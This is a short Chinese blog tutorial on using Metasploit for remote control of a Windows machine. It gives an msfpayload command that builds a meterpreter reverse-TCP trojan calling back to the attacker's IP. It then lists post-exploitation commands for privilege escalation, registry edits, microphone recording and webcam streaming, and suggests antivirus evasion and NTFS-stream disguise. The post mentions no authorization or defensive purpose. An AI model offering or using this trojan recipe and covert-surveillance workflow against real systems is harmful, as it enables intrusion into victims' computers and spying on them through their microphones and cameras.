渗透测试网络与信息安全信息安全

metasploit之远程控制

2017-03-22  本文已影响1590人  Hell0_C

metasploit是一个开源的功能强大的安全漏洞检测工具,也是非常厉害的渗透测试工具。它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试、shellcode 编写和漏洞研究提供了一个可靠平台。

这种可以扩展的模型将负载控制(payload)、编码器(encode)、无操作生成器(nops)和漏洞整合在一起,使 Metasploit Framework 成为一种研究高危漏洞的途径。它集成了各平台上常见的溢出漏洞和流行的 shellcode ,并且不断更新。目前的版本收集了数百个实用的溢出攻击程序及一些辅助工具,让人们使用简单的方法完成安全漏洞检测,即使一个不懂安全的人也可以轻松的使用它。

我们可以下载Windows版本进行安装,官方网站http://www.metasploit.com/

也可以利用kali linux自带的,无需安装。

Metasploit目前提供了三种用户使用接口,一个是GUI模式,另一个是console模式,第三种是CLI(命令行)模式



这里我们利用metasploit进行远程控制,利用他生成木马,将我们的木马运行在目标主机就ok了。

木马 控制端 服务端

0x01、制作木马

获取meterpreter,首先根据我们的ip生成一个木马

msfpayload windows/meterpreter/reverse_tcp LHOST=你的ip LPORT=55555  X > muma.exe

这样我们就远程连接到电脑,可以进行更为深入的操作了

sysinfo  #获取系统信息
getsystem #获取高权限
reg       #修改注册表
record_mic #音频录制
webcam_stream #摄像头视频获取
......

对于木马,我们可以做相应的免杀躲过杀毒软件的报毒,以及可以利用我们上个博客讲的NTFS流进行伪装。

上一篇下一篇

猜你喜欢

热点阅读